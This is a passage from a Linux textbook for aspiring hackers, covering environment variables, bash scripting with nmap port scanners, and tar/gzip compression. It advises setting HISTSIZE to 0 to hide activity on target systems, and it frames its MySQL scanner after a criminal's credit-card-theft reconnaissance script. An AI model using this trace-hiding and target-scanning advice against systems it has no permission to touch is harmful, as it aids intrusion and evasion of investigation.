When you press ENTER, the terminal advances to the next line, taking you to

the next variable, so you can scroll through by pressing or holding ENTER.
As you might recall from Chapter 2, whenever you use the more command
for output, you can enter q to quit (or exit) and return to the command
prompt.
Filtering for Particular Variables
Although using set with more gives more manageable results than looking
through the huge chunk of variable names you get with set alone, it can still
be rather tedious if you’re looking for a particular variable. Instead, you can
use the filtering command grep to find your variable of interest.
Let’s use the variable HISTSIZE as an example. This variable contains the
maximum number of commands your command history file will store. The
command history file contains the commands you’ve previously typed into
your command prompt in this session, which you can retrieve with the up
and down arrow keys. Note that HISTSIZE doesn’t store the commands
themselves, just the number of them that can be stored.
Pipe your set output with grep to find the HISTSIZE variable, like so:
kali> set | grep HISTSIZE
HISTSIZE=1000

As you can see, this command finds the variable HISTSIZE and displays its
value. By default, it is probably set to 1000 on your system. This indicates
that the terminal will store your last 1,000 commands by default.
Changing Variable Values for a Session
Now let’s see how to change a variable’s value. As noted, the HISTSIZE
variable contains the number of commands to store in the history file.
Sometimes, you won’t want your system to save past commands. Perhaps
because you don’t want to leave any evidence of your activity on a target
system. In that case, you can set the HISTSIZE variable to 0 so the system
won’t store any of your past commands. Because this variable has a single
value, you can simply assign it a new value in the familiar way shown in
Listing 7-1.
kali> HISTSIZE=0
Listing 7-1: Changing the value of HISTSIZE
Now, when you try to use the up and down arrow keys to recall your
commands, nothing happens because the system no longer stores them. This
is stealthy, although it can be inconvenient.
Making Variable Value Changes Permanent

When you change an environment variable, that change occurs only in that
particular environment (in this case, the bash shell session). This means that
when you close the terminal, any changes you made are lost, and values
return to their defaults. If you want to make the changes permanent, you
need to use the export command. This command exports the new value from
your current environment to the rest of the system, making it available in
every environment until you change and export a new value.
Variables are strings, so if you run on the cautious side, it isn’t a bad idea to
save their contents to a text file before you modify them. For example, since
we’re about to change the PS1 variable, which controls the information you
display in the prompt, you can first run the following command to save the
existing values to a text file in the current user’s home directory:
kali> echo $HISTSIZE> ~/valueofHISTSIZE.txt
This way, you can always undo your changes. To be even more cautious and
create a text file with all the current settings, you can save the output of the
set command to a text file with a command like this one:
kali> set> ~/valueofALLon01012025.txt
After you’ve changed a variable, as we did in Listing 7-1, you can make the
change permanent by entering export and then the name of the variable you

changed, as shown here:
kali> export HISTSIZE
Now the HISTSIZE variable will still be set to 0 in this environment and will
no longer store your commands. If you want to reset the HISTSIZE variable to
1,000, simply enter this:
kali> HISTSIZE=1000
kali> export HISTSIZE
This code snippet sets your HISTSIZE variable’s value to 1,000 and exports it
to all your environments.
Changing Your Shell Prompt
Your shell prompt, another environment variable, provides you with useful
information such as the user you’re operating as and the directory in which
you’re currently working. The default shell prompt in Kali takes the
following format:
username@hostname:current_directory$

If you’re working as the root user, this translates to the following default
prompt:
root@kali:current_directory#
You can change the name in the default prompt by setting the value for the
PS1 variable, which contains a set of placeholders for the information to
display in the prompt, including the following:
\u The name of the current user
\h The hostname
\w The base name of the current working directory
This is very useful if you happen to have shells on multiple systems or are
logged into multiple accounts. By using the \u and \h values, you can tell at
a glance who you are and what your current system is.
Let’s have a little fun and change the prompt in your terminal. For example,
you could enter the following:
kali> PS1="World's Best Hacker: #"
World's Best Hacker: #
Now, every time you use this terminal, you’ll be reminded that you are the
world’s best hacker. But any subsequent terminal you open will still have

the default command prompt, because the PS1 variable holds values for your
terminal session only. If you really like this new command prompt and want
to continue to use it, you need to export it, like so:
kali> export PS1
How about a little more fun? Say you really want your terminal to look like
a Windows cmd prompt. In this case, you could change the prompt name to
C: and keep the \w to have the prompt show your current directory, as shown
in Listing 7-2.
kali> export PS1='C:\w> '
C:/tmp>
Listing 7-2: Changing the prompt and showing the current directory
Displaying your current directory in the prompt can be useful, particularly
to a beginner, so it’s something to consider when you change your PS1
variable.
Changing Your PATH

One of the most important variables in your environment is your PATH
variable, which controls where on your system your shell will look for the
commands you enter, such as grep, ls, and echo. Most commands are located
in the sbin or bin subdirectory, like /usr/local/sbin or /usr/local/bin. If the
bash shell doesn’t find the command in one of the directories in your PATH
variable, it will return the error command not found, even if that command
exists in a directory not in your PATH.
You can find out which directories are stored in your PATH variable by using
echo on its contents, like so:
kali> echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
Your terminal will search the directories listed here for all commands.
When you enter ls, for example, the system will know to look in each of
these directories for it, then execute it.
Each directory is separated by a colon (:). Don’t forget to add the $ content
symbol to PATH. When we put a $ before a variable, we are asking the system
for the content of the variable.
Adding to the PATH Variable

You can probably see why it’s important to know what is in your PATH
variable: if you downloaded and installed a new tool (say, newhackingtool)
into the /root/newhackingtool directory, you could use commands from that
tool only when you were in that directory, because that directory is not in
the PATH variable. Every time you wanted to use that tool, you would first
have to navigate to /root/newhackingtool, which is a bit inconvenient if you
want to use the tool often.
To be able to use this new tool from any directory, you need to add the
directory holding this tool to your PATH variable. To add newhackingtool to
your PATH variable, enter the following:
kali> PATH=$PATH:/root/newhackingtool
This assigns the original PATH variable plus the /root/newhackingtool
directory to the new PATH variable, so the variable contains everything it did
before, plus the new tool directory.
If you examine the contents of the PATH variable again, you should see that
the directory has been appended to the end of PATH, as shown here:
kali> echo $PATH
/usr/local/sbin:usr/local/bin:/usr/sbin:/sbin/bin

Now you can execute newhackingtool applications from anywhere on your
system, rather than having to navigate to its directory. The bash shell will
look in all directories listed for your new tool.
NOTE
Adding to PATH can be a useful technique for directories you
use often but be careful not to add too many directories to
your PATH variable. Because the system will have to search
through each and every directory in PATH to find commands,
adding a lot of directories could slow down your terminal.
How Not to Add to the PATH Variable
One mistake commonly made by new Linux users is assigning a new
directory, such as /root/newhackingtool, directly to the PATH variable in this
way:
kali> PATH=/root/newhackingtool
kali> echo $PATH
/root/newhackingtool
If you use this command, your PATH variable will contain only the
/root/newhackingtool directory and no longer contain the system binaries

directories such as /bin, /sbin, and others that hold critical commands. When
you then go to use any of the system commands, you’ll receive the error
command not found, as shown next, unless you first navigate to the system
binaries directory when you execute the command:
kali> ls
bash: ls: command not found
Remember that you want to append to the PATH variable, not replace it. If
you’re in doubt, save the contents of the variable somewhere before you
modify it.
Creating a User-Defined Variable
You can create your own custom, user-defined variables in Linux by simply
assigning a value to a new variable that you name. This may be useful when
you are doing some more advanced shell scripting or find that you’re often
using a long command that you get tired of typing over and over.
The syntax is straightforward: enter the name of your variable, followed by
the assignment symbol (=) without a space, and the value to put in the
variable, as shown here:
kali> MYNEWVARIABLE="Hacking is the most valuable skill s

This assigns a string to the variable MYNEWVARIABLE. To see the value in that
variable, use the echo command and the $ content symbol with the variable
name, as we did earlier:
kali> echo $MYNEWVARIABLE
Hacking is the most valuable skill set in the 21s
Just like our system environment variables, user-defined variables must be
exported to persist to new sessions.
If you want to delete this new variable, or any variable, use the unset
command. Always think before deleting a system variable, though, because
your system will probably operate much differently afterward.
kali> unset MYNEWVARIABLE
kali> echo $MYNEWVARIABLE
kali>
As you can see, when you enter unset MYNEWVARIABLE, you delete the variable
along with its value. If you use echo on that same variable, Linux will now
return a blank line.
Summary

You might find environment variables foreign, but it’s worth getting to
know them. They control how your working environment in Linux looks,
acts, and feels. You can manage these variables to tailor your environment
to your needs by changing them, exporting them, and even creating your
own. In some cases, they may be useful for covering your tracks as a
hacker.
Exercises
1. View all of your environment variables with the more command.
2. Use the echo command to view the HOSTNAME variable.
3. Find a method to change the slash (/) to a backslash (\) in the faux
Microsoft cmd PS1 example (see Listing 7-2).
4. Create a variable named MYNEWVARIABLE and put your name in it.
5. Use echo to view the contents of MYNEWVARIABLE.
6. Export MYNEWVARIABLE so that it’s available in all environments.
7. Use the echo command to view the contents of the PATH variable.
8. Add your home directory to the PATH variable so that any binaries in your
home directory can be used in any directory.
OceanofPDF.com

8
BASH SCRIPTING

Any self-respecting hacker must be able to write scripts. For that matter,
any self-respecting Linux administrator must be able to script. Hackers
often need to automate commands, sometimes from multiple tools, and this
is most efficiently done through short programs they write themselves.
In this chapter, we build a few simple bash shell scripts to start you off with
scripting. We’ll add capabilities and features as we progress, eventually
building a script capable of finding potential attack targets over a range of
IP addresses.
To become an elite hacker, you also need the ability to script in one of the
widely used scripting languages, such as Ruby (Metasploit exploits are
written in Ruby), Python (many hacking tools are Python scripts), or Perl
(Perl is the best text-manipulation scripting language). I give a brief
introduction to Python scripting in Chapter 17.
A Crash Course in Bash
A shell is an interface between the user and the operating system that
enables you to manipulate files and run commands, utilities, programs, and
much more. The advantage of a shell is that you perform these tasks
immediately from the computer and not through an abstraction, like a GUI,
which allows you to customize your task to your needs. As mentioned in
Chapter 7, a number of different shells are available for Linux, including

the Korn shell, the Z shell, the C shell, and the Bourne-again shell, more
widely known as bash.
In recent years, the developers of Kali Linux have changed from the bash
shell to the Z shell as the default shell. Although there is nothing wrong
with the Z shell (macOS has changed as well) since most Linux and Unix
distributions (Red Hat, Ubuntu, Solaris, and so on) still use the bash shell, I
think we should too. Luckily, the developers of Kali Linux have made it
easy to switch your default shell back to bash using the command kali-
tweaks.
Simply enter this command
kali> kali-tweaks
and it opens a graphical user interface like that shown in Figure 8-1.
Figure 8-1: The main Kali menu

Use your down arrow key to select the fourth option, Shell & Prompt, and
press ENTER. This will open the screen shown in Figure 8-2.
Figure 8-2: The Shell & Prompt setting
Scroll down to the second option, Default Login Shell, and press ENTER.
This will open the screen shown in Figure 8-3.
Figure 8-3: Selecting the bash shell

Use your spacebar to select Bash and then scroll down to Apply and press
ENTER. You will then be prompted for your password, and when you enter it,
your system will respond with the message shown in Figure 8-4.
Figure 8-4: Kali lets you know that the login shell has changed.
Now, press ENTER, log out and log back in, and your shell will be changed to
the most common shell in the Linux/Unix world, bash!
The bash shell can run any system commands, utilities, or applications your
usual command line can run, but it also includes some of its own built-in
commands. Table 8-1 later in the chapter provides a reference to some
useful commands that reside within the bash shell.
In earlier chapters, you used the cd, pwd, set, and umask commands. In this
chapter, you will be using two more commands: the echo command, used in
Chapter 7, which displays messages to the screen, and the read command,
which reads in data and stores it somewhere else. Just learning these two
commands alone will enable you to build a simple but powerful tool.
You’ll need a text editor to create shell scripts. A text editor is a program
that can edit plain, unformatted text, like Notepad in Windows or TextEdit

in macOS. You can use whichever Linux text editor you like best. Popular
hacker choices include vi, vim, emacs, gedit, kate, and so on. I’ll be using
mousepad in this book, as I have in previous chapters. Using a different
editor should not make any difference in your script or its functionality.
Your First Script: “Hello, Hackers-Arise!”
For your first script, we will start with a simple program that returns a
message to the screen that says Hello, Hackers-Arise! Open your text editor,
and let’s go.
To start, you need to tell your operating system which interpreter you want
to use for the script. To do this, enter a shebang, which is a combination of
a hash mark and an exclamation mark, like so:
#!
You then follow the shebang (#!) with /bin/bash to indicate that you want the
operating system to use the bash shell interpreter. As you’ll see in later
chapters, you could also use the shebang to use other interpreters, such as
Perl or Python. Here, you want to use the bash interpreter, so enter the
following:
#! /bin/bash

Next, enter the echo command, which tells the system to simply repeat (or
echo) back to your monitor whatever follows the command.
In this case, we want the system to echo back to us Hello, Hackers-Arise!, as
done in Listing 8-1. Note that the text or message we want to echo back
must be in double quotation marks.
#! /bin/bash
# This is my first bash script. Wish me luck.
echo "Hello, Hackers-Arise!"
Listing 8-1: Your “Hello, Hackers-Arise!” script
Here, you also see a line that’s preceded by a hash mark (#). This is a
comment, which is a note you leave to yourself or anyone else reading the
code, to explain what you’re doing in the script. Programmers use
comments in every coding language. These comments are not read or
executed by the interpreter, so you don’t need to worry about messing up
your code. They are visible only to humans. The bash shell knows a line is a
comment if it starts with the # character.
Now, save this file as HelloHackersArise with no extension, and exit your
text editor.

Setting Execute Permissions
By default, a newly created bash script is not executable even by you, the
owner. Let’s look at the permissions on our new file in the command line by
using cd to move into the directory and then entering ls -l. It should look
something like this:
kali> ls -l
--snip--
-rw-r--r-- 1 kali kali 90 Oct 22 14:32 HelloHacke
--snip--
As you can see, our new file has rw-r--r-- (644) permissions. As you learned
in Chapter 5, this means the owner of this file has only read (r) and write (w)
permissions, but no execute (x) permissions. The group and all other users
have only read permissions. We need to give ourselves execute permissions
in order to run this script. We change the permissions with the chmod
command, as you saw in Chapter 5. To give the owner, the group, and all
others execute permissions, enter the following:
kali> sudo chmod 755 HelloHackersArise
Now when we do a long listing on the file, like so, we can see that we have
execute permissions:

kali> ls -l
--snip--
-rwx r-x r-x 1 kali kali 42 Oct 22 14:32 HelloHac
--snip--
The file will also be in green, another indicator of its execute permissions.
The script is now ready to run!
Running HelloHackersArise
To run our simple script, enter the following:
kali> ./HelloHackersArise
The ./ before the filename tells the system that we want to execute this
script in the file HelloHackersArise from the current directory. It also tells
the system that if there is another file in another directory named
HelloHackersArise, please ignore it and run HelloHackersArise only in the
current directory. It may seem unlikely that there’s another file with this
name on your system, but it’s good practice to use the ./ when executing
files, as this localizes the file execution to the current directory, and many
directories will have duplicate filenames, such as start and setup.

When we press ENTER, our very simple script returns our message to the
monitor:
Hello, Hackers-Arise!
Success! You just completed your first shell script!
Adding Functionality with Variables and User Input
So, now we have a simple script. All it does is echo back a message to
standard output. If we want to create more advanced scripts, we will likely
need to add some variables.
A variable is an area of storage that can hold something in memory. That
“something” might be some letters or words (strings) or numbers. It’s
known as a variable because the values held within it are changeable; this is
an extremely useful feature for adding functionality to a script.
In our next script, we will add functionality to prompt the user for their
name, place whatever they input into a variable, then prompt the user for
the chapter they’re at in this book, and place that keyboard input into a
variable. After that, we’ll echo a welcome message that includes their name
and the chapter back to the user.
Open a new file in your text editor and enter the script shown in Listing 8-2.

➊ #! /bin/bash
➋ # This is your second bash script. In this one
   # the user for input, place the input in a var
   # display the variable contents in a string.
➌ echo "What is your name?"
   read name
➍ echo "What chapter are you on in Linux Basics 
   read chapter
➎ echo "Welcome $name to Chapter $chapter of Lin
Listing 8-2: A simple script making use of variables
We open with #! /bin/bash to tell the system we want to use the bash
interpreter for this script ➊. We then add a comment that describes the
script and its functionality ➋. After that, we prompt the user for their name
and ask the interpreter to read the input and place it into a variable we call
name ➌. Then we prompt the user to enter the chapter they are currently
working through in this book, and we again read the keyboard input into a
variable, this time called chapter ➍.

In the final line, we construct a line of output that welcomes the reader by
their name to the chapter they are on ➎. We use the echo command and
provide the text we want to display on the screen in double quotes. Then, to
fill in the name and chapter number the user entered, we add the variables
where they should appear in the message. As noted in Chapter 7, to use the
values contained in the variables, you must precede the variable name with
the $ symbol.
Save this file as WelcomeScript.sh. The .sh extension is the convention for
script files. You might have noticed we didn’t include the extension earlier;
it’s not strictly required, and it makes no difference if you leave the
extension off. The extension can be a useful indicator for other people that
this file is a shell script, though.
Now, let’s run this script. Don’t forget to give yourself execute permission
with chmod first; otherwise, the operating system will scold you with a
Permission denied message.
kali> ./WelcomeScript.sh
What is your name?
OccupytheWeb
What chapter are you on in Linux Basics for Hacke
8
Welcome OccupytheWeb to Chapter 8 of Linux Basics f

As you can see, your script took input from the user, placed it into
variables, and then used those inputs to make a greeting for the user.
This is a simple script, but it taught you how to use variables and take input
from the keyboard. These are both crucial concepts in scripting that you
will need to use in more complex scripts in future.
Your Very First Hacker Script: Scan for Open
Ports
Now that you have some basic scripting skills, let’s move to some slightly
more advanced scripting that has real-world application to hacking. We’ll
use an example from the world of black hat hacking. Black hat hackers are
those with malicious intentions, such as stealing credit card numbers or
defacing websites. White hat hackers are those with good intentions, such
as helping software developers or system administrators make their systems
more secure. Gray hat hackers are those who tend to move between these
two extremes.
Before you continue, you need to become familiar with a simple yet
essential tool named nmap that comes installed on Kali by default. You’ve
likely heard the name; nmap is used to probe a system to see whether it is
connected to the network and finds out what ports are open. From the open
ports discovered, you can surmise what services are running on the target
system. This is a crucial skill for any hacker or system administrator.

In its simplest form, the syntax for running an nmap scan looks like this:
nmap<type of scan><target IP><optionally, target port>
Not too difficult. The simplest and most reliable nmap scan is the TCP
connect scan, designated with the -sT switch in nmap. So, if you wanted to
scan IP address 192.168.181.1 with a TCP scan, you would enter the
following:
nmap -sT 192.168.181.1
To take things a step further, if you wanted to perform a TCP scan of
address 192.168.181.1, looking to see whether port 3306 (the default port
for MySQL and MariaDB) was open, you could enter this:
nmap -sT 192.168.181.1 -p 3306
Here, -p designates the port you want to scan for. Go ahead and try it out
now on your Kali system.
Our Task
A hacker by the name of Max Butler, also known as Max Vision throughout
the hacker world, was released from US federal prison in 2021. Max was a

kind of gray hat hacker. By day, he was an IT security professional in
Silicon Valley, and by night, he was stealing and selling credit card numbers
on the black market. At one time, he ran the world’s largest credit card
black market, CardersMarket. Max served a 13-year prison term while at
the same time assisting the Computer Emergency Response Team (CERT)
in Pittsburgh with defending against hackers.
A few years before Max was caught, he realized that the Aloha Point of Sale
(POS) system used by many small restaurants had a technical support
backdoor built into it. In this case, the backdoor enabled tech support to
assist their clients. Aloha tech support could access the end user’s system
through port 5505 to provide assistance when the user called for help. Max
realized that if he found a system connected to the internet with the Aloha
POS system, he could access the system with sysadmin (the all-powerful
system administrator) privileges through port 5505. Max was able to enter
many of these systems and steal tens of thousands of credit card numbers.
Eventually, Max wanted to find every system that had port 5505 open so
that he could go from stealing thousands of credit card numbers to stealing
millions. Max decided to write a script that would scan millions of IP
addresses looking for systems with port 5505 open. Of course, most
systems do not have port 5505 open, so if they did, it was likely they were
running the doomed Aloha POS. He could run this script while at work
during the day, then by night, hack into those systems identified as having
port 5505 open.

Our task is to write a script that will be nearly identical to Max’s script, but
rather than scan for port 5505 as Max did, our script will scan for systems
connected to the ubiquitous online database MySQL or MariaDB. MySQL
and MariaDB are open source databases used behind millions of websites;
we’ll be working with MySQL in Chapter 12. By default, MySQL uses port
3306. Databases are the “golden fleece” that nearly every black hat hacker
is seeking, as they often contain credit card numbers and personally
identifiable information (PII) that is very valuable on the black market.
A Simple Scanner
Before we write the script to scan public IPs across the internet, let’s take
on a much smaller task. Instead of scanning the globe, let’s first write a
script to scan for port 3306 on a local area network to see whether our script
actually works. If it does, we can easily edit it to do the much larger task.
In your text editor, enter the script shown in Listing 8-3.
➊ #! /bin/bash
➋ # This script is designed to find hosts with M
   nmap ➌ -sT 192.168.181.0/24 -p 3306 >/dev/nul
➍ cat MySQLscan | grep open > MySQLscan2

cat MySQLscan2
Listing 8-3: The simplified scanner script
We start with the shebang and the interpreter to use ➊. Let’s follow this
with a comment to explain what the script does ➋.
Now let’s use the nmap command to request a TCP scan ➌ on our LAN,
looking for port 3306. (Note that your IP addresses may differ; in your
terminal, use the ifconfig command on Linux or the ipconfig command on
Windows to determine your IP address.) The redirect symbol > tells the
standard nmap output, which usually goes to the screen, to instead go to
/dev/null, which is simply a place to send output so that it disappears. We’re
doing this on a local machine, so it doesn’t matter so much, but if you were
to use the script remotely, you’d want to hide the nmap output. We then
send the output of the scan to a file named MySQLscan in a grep-able
format, meaning a format that grep can work on.
The next line displays the MySQLscan file we stored the output in and then
pipes that output to grep to filter for lines that include the keyword open ➍.
Then we put those lines into a file named MySQLscan2.
Finally, you display the contents of the file MySQLscan2. This final file
should only include lines of output from nmap with hosts that have port

3306 open. Save this file as MySQLscanner.sh and give yourself execute
permissions with chmod 755.
Execute the script, like so:
kali> ./MySQLscanner.sh
Host: 192.168.181.69 () Ports: 3306/open/tcp//mys
As the output shows, this script was able to identify the only IP address on
my LAN with MySQL or MariaDB running. Your results may differ,
depending on whether any ports are running MySQL installations on your
local network, of course.
An Improvement to the MySQL Scanner
Now we want to adapt this script to make it applicable to more than just
your own local network. This script would be much easier to use if it could
prompt the user for the range of IP addresses they wanted to scan and the
port to look for, and then use that input. Remember, you learned how to
prompt the user and put their keyboard input into a variable in “Adding
Functionality with Variables and User Input” on page 86.
Let’s take a look at how you could use variables to make this script more
flexible and efficient.

Adding Prompts and Variables to Our Hacker Script
In your text editor, enter the script shown in Listing 8-4.
   #! /bin/bash
➊ echo "Enter the starting IP address : "
➋ read FirstIP
➌ echo "Enter the last octet of the last IP addr
   read LastOctetIP
➍ echo "Enter the port number you want to scan f
   read port
➎ nmap -sT $FirstIP-$LastOctetIP -p $port >/dev/
➏ cat MySQLscan | grep open > MySQLscan2
➐ cat MySQLscan2
Listing 8-4: Your advanced MySQL port scanner
The first thing we need to do is replace the specified subnet with an IP
address range. We’ll create a variable called FirstIP and a second variable
named LastOctetIP to create the range as well as a variable named port for the

port number (the last octet is the last group of digits after the third period in
the IP address. In the IP address 192.168.1.101, the last octet is 101).
NOTE
The name of the variable is irrelevant, but best practice is to
use a variable name that helps you remember what the
variable holds.
We also need to prompt the user for these values. We can do this by using
the echo command that we used in Listing 8-1.
To get a value for the FirstIP variable, echo "Enter the starting IP address : "
to the screen, asking the user for the first IP address they want to scan ➊.
Upon seeing this prompt on the screen, the user will enter the first IP
address, so we need to capture that input from the user.
We can do this with the read command followed by the name of the variable
we want to store the input in ➋. This command will put the IP address
entered by the user into the variable FirstIP. Then we can use that value in
FirstIP throughout our script.
We’ll do the same for the LastOctetIP ➌ and port ➍ variables by prompting
the user to enter the information and then using a read command to capture
it.

Next, we need to edit the nmap command in our script to use the variables we
just created and filled. To use the value stored in the variable, we simply
preface the variable name with $, as in $port, for example. So, we scan a
range of IP addresses ➎, starting with the first user-input IP through the
second user-input IP, and look for the particular port input by the user.
We’ve used the variables in place of the subnet to scan and the port to
determine what to scan for. As before, we send the standard output to
/dev/null. Then, we send the output in a grep-able format to a file we named
MySQLscan.
The next line remains the same as in our simple scanner: it outputs the
contents of the MySQLscan file, pipes it to grep, where it is filtered for lines
that include the keyword open, and then sends that output to a new file
named MySQLscan2 ➏. Finally, we display the contents of the
MySQLscan2 file ➐.
If everything works as expected, this script will scan IP addresses from the
first input address to the last input address, searching for the input port and
then reporting back with just the IP addresses that have the designated port
open. Save your script file as MySQLscannerAdvanced, remembering to
give yourself execute permission.
Running the Scanner

Now we can run our simple scanner script with the variables that determine
what IP address range and port to scan without having to edit the script
every time we want to run a scan:
kali> ./MySQLscannerAdvanced.sh
Enter the starting IP address :
192.168.181.0
Enter the last octet of the last IP address :
255
Enter the port number you want to scan for :
3306
Host: 192.168.181.254 () Ports:3306/open/tcp//mys
The script prompts the user for the first IP address, the last octet of the last
IP address, and then the port to scan for. After collecting this information,
the script performs the nmap scan and produces a report of all the IP
addresses in the range that have the specified port open. As you can see,
even the simplest of scripting can create a powerful tool. You’ll learn even
more about scripting in Chapter 17.
Common Built-in Bash Commands

As promised, Table 8-1 gives you a list of some useful commands built into
bash.
Table 8-1: Built-in Bash Commands
Command Function
: Returns 0 or true
. Executes a shell script
[[ Performs a conditional test
bg Puts a job in the background
break Exits the current loop
cd Changes directory
continue Resumes the current loop
echo Displays the command arguments
eval Evaluates the following expression

Command Function
exec Executes the following command without creating a
new process, replacing the current process
exit Quits the shell
export Makes a variable or function available to other
programs that are executed from this shell
fg Brings a job to the foreground
getopts Parses arguments to the shell script
jobs Lists background (bg) jobs
pwd Displays the current directory
read Reads a line from standard input
readonly Declares a variable as read-only
set Lists all variables

Command Function
shift Moves the script’s input parameters to the left, dropping
the first parameter (useful for consuming all parameters
one at a time)
test Evaluates arguments
times Prints the user and system times
trap Traps a signal so the script can handle it (untrapped
signals terminate the script)
type Displays how each argument would be interpreted as a
command
umask Changes the default permissions for a new file
unset Deletes values from a variable or function
wait Waits for a background process to complete
Summary

Scripting is an essential skill for any hacker or system administrator. It
enables you to automate tasks that would normally take hours of your time,
and once the script is saved, it can be used over and over again. Bash
scripting is the most basic form of scripting, and you will advance to
Python scripting with even more capabilities in Chapter 17.
Exercises
1. Create your own greeting script similar to our HelloHackersArise script.
2. Create a script similar toMySQLscanner.sh but design it to find systems
with Microsoft’s SQL Server database at port 1433. Call it
MSSQLscanner.
3. Alter that MSSQLscanner script to prompt the user for a starting and
ending IP address and the port to search for. Then filter out all the IP
addresses where those ports are closed and display only those that are
open.
OceanofPDF.com

9
COMPRESSING AND ARCHIVING

Hackers often need to download and install new software, as well as send
and download multiple scripts and large files. These tasks are easier if these
files are compressed and combined into a single file. If you come from the
Windows world, you will probably recognize this concept from the .zip
format, which combines and compresses files to make them smaller for
transferring over the internet or removable media. There are many ways to
do this in Linux, and we look at a few of the most common tools for doing
so in this chapter. We also look at the dd command, which allows you to
copy entire drives, including deleted files on those drives.
What Is Compression?
The interesting subject of compression could fill an entire book by itself,
but for this book we need only a rudimentary understanding of the process.
Compression, as the term implies, makes data smaller, thereby requiring
less storage capacity and making the data easier to transmit. For your
purposes as a beginning hacker, it will suffice to categorize compression as
either lossy or lossless.
Lossy compression is very effective in reducing the size of files, but the
integrity of the information is lost. In other words, the file after
compression is not exactly the same as the original. This type of
compression works great for graphics, video, and audio files, where a small
difference in the file is hardly noticeable—.mp3, .mp4, .png, and .jpg are all
lossy compression algorithms. If a pixel in a .png file or a single note in an

.mp3 file is changed, your eye or ear is unlikely to notice the difference—
though, of course, music aficionados will say that they can definitely tell
the difference between an .mp3 and an uncompressed .flac file. The
strengths of lossy compression are its efficiency and effectiveness. The
compression ratio is very high, meaning that the resulting file is
significantly smaller than the original.
However, lossy compression is unacceptable when you’re sending files or
software and data integrity is crucial. For example, if you are sending a
script or document, the integrity of the original file must be retained when it
is decompressed. This chapter focuses on this lossless type of compression,
which is available from a number of utilities and algorithms. Unfortunately,
lossless compression is not as efficient as lossy compression, as you might
imagine, but for the hacker, integrity is often far more important than
compression ratio.
Tarring Files Together
Usually, the first thing you do when compressing files is to combine them
into an archive. In most cases, when archiving files, you’ll use the tar
command. Tar stands for tape archive, a reference to the prehistoric days of
computing when systems used tape to store data. The tar command creates
a single file from many files, which is then referred to as an archive, tar file,
or tarball.

For instance, say you had three script files like the ones we used in Chapter
8, named hackersarise1, hackersarise2, and hackersarise3. If you navigate
to the directory that holds them and perform a long listing, you can clearly
see the files and the details you’d expect, including the size of the files, as
shown here:
kali> ls -l
-rwxr-xr-x 1 kali kali 22311  Nov 27 2024 13:00 h
-rwxr-xr-x 1 kali kali 8791   Nov 27 2024 13:00 h
-rwxr-xr-x 1 kali kali 3992   Nov 27 2024 13:00 h
Let’s say you want to send all three of these files to another hacker you’re
working with on a project. You can combine them and create a single
archive file using the command in Listing 9-1.
kali> tar -cvf HackersArise.tar hackersarise1.sh hackersa
hackersarise1.sh
hackersarise2.sh
hackersarise3.sh
Listing 9-1: Creating a tarball of three files
Let’s break down this command to better understand it. The archiving
command is tar, and we’re using it here with three options. The c option

means create, v (which stands for verbose and is optional) lists the files that
tar is dealing with, and f means write to the following file. This last option
will also work for reading from files. Then we give the new archive the
filename you want to create from the three scripts: HackersArise.tar.
In full, this command takes all three files and creates a single file,
HackersArise.tar, out of them. When you do another long listing of the
directory, you will see that it also contains the new .tar file, as shown next:
kali> ls -l
--snip--
-rw-rw-r-- 1 kali kali  40960 Nov 27 2024 13:32 H
--snip--
Note the size of the tarball here: 40,960 bytes. When the three files are
archived, tar uses significant overhead to perform this operation: whereas
the sum of the three files before archiving was 35,094 bytes, after archiving,
the tarball had grown to 40,960 bytes. In other words, the archiving process
has added over 5,000 bytes. Although this overhead can be significant with
small files, it becomes less and less significant with larger and larger files.
We can display those files from the tarball, without extracting them, by
using the tar command with the -t content list switch, as shown next:

kali> tar -tvf HackersArise.tar
-rwxr-xr-x 1 root root 22311  Nov 27  2024 13:00 
-rwxr-xr-x 1 root root 8791   Nov 27  2024 13:00 
-rwxr-xr-x 1 root root 3992   Nov 27  2024 13:00 
Here, we see our three original files and their original sizes. You can then
extract those files from the tarball using the tar command with the -x
(extract) switch, as shown next:
kali> tar -xvf HackersArise.tar
hackersarise1.sh
hackersarise2.sh
hackersarise3.sh
Because you’re still using the –v switch, this command shows which files
are being extracted in the output. If you want to extract the files and do so
“silently,” meaning without showing any output, you can simply remove the
-v (verbose) switch, as shown here:
kali> tar -xf HackersArise.tar
The files have been extracted into the current directory; you can do a long
listing on the directory to double-check. Note that by default, if an extracted

file already exists, tar will remove the existing file and replace it with the
extracted file.
Compressing Files
Now we have one archived file, but that file is bigger than the sum of the
original files. What if you want to compress those files for ease of
transport? Linux has several commands capable of creating compressed
files:
gzip, which uses the extension .tar.gz or .tgz
bzip2, which uses the extension .tar.bz2
compress, which uses the extension .tar.z
These commands are all are capable of compressing our files, but they use
different compression algorithms and have different compression ratios.
Therefore, we’ll look at each one and what it’s capable of.
In general, compress is the fastest, but the resultant files are larger; bzip2 is the
slowest, but the resultant files are the smallest; and gzip falls somewhere in
between. The main reason you, as a budding hacker, should know all three
methods is that when accessing other tools, you will run into various types
of compression. Therefore, this section shows you how to deal with the
main methods of compression.
Compressing with gzip

Let’s try gzip (GNU zip) first, as it is the most commonly used compression
utility in Linux. You can compress your HackersArise.tar file by entering
the following (making sure you’re in the directory that holds the archived
file):
kali> sudo gzip HackersArise.*
Notice that we used the wildcard * for the file extension; this tells Linux
that the command should apply to any file that begins with HackersArise
with any file extension. You will use similar notation for the following
examples. When we do a long listing on the directory, we can see that
HackersArise.tar has been replaced by HackersArise.tar.gz, and the file size
has been compressed to just 3,299 bytes!
kali> ls -l
--snip--
-rw-r--r-- 1 root root  3299 Nov 27 2024 13:32 Ha
--snip--
We can then decompress that same file by using the gunzip command, short
for GNU unzip:
kali> gunzip HackersArise.*

Once uncompressed, the file is no longer saved with the .tar.gz extension
but with the .tar extension instead. Also, notice that it has returned to its
original size of 40,960 bytes. Try doing a long list to confirm this. It’s worth
noting that gzip can also be used to extract .zip files.
Compressing with bzip2
Another of the other widely used compression utilities in Linux is bzip2,
which works similarly to gzip but has better compression ratios, meaning
that the resulting file will be even smaller. You can compress your
HackersArise.tar file by entering the following:
kali> bzip2 HackersArise.*
When you do a long listing, you can see that bzip2 has compressed the file
down to just 2,081 bytes! Also note that the file extension is now .tar.bz2.
To uncompress the compressed file, use bunzip2, like so:
kali> bunzip2 HackersArise.*
When you do, the file returns to its original size, and its file extension
returns to .tar.
Compressing with compress

Finally, you can use the compress command to compress the file. This is
probably the least commonly used compression utility, but it’s easy to
remember. To use it, simply enter the command compress followed by the
filename, like so:
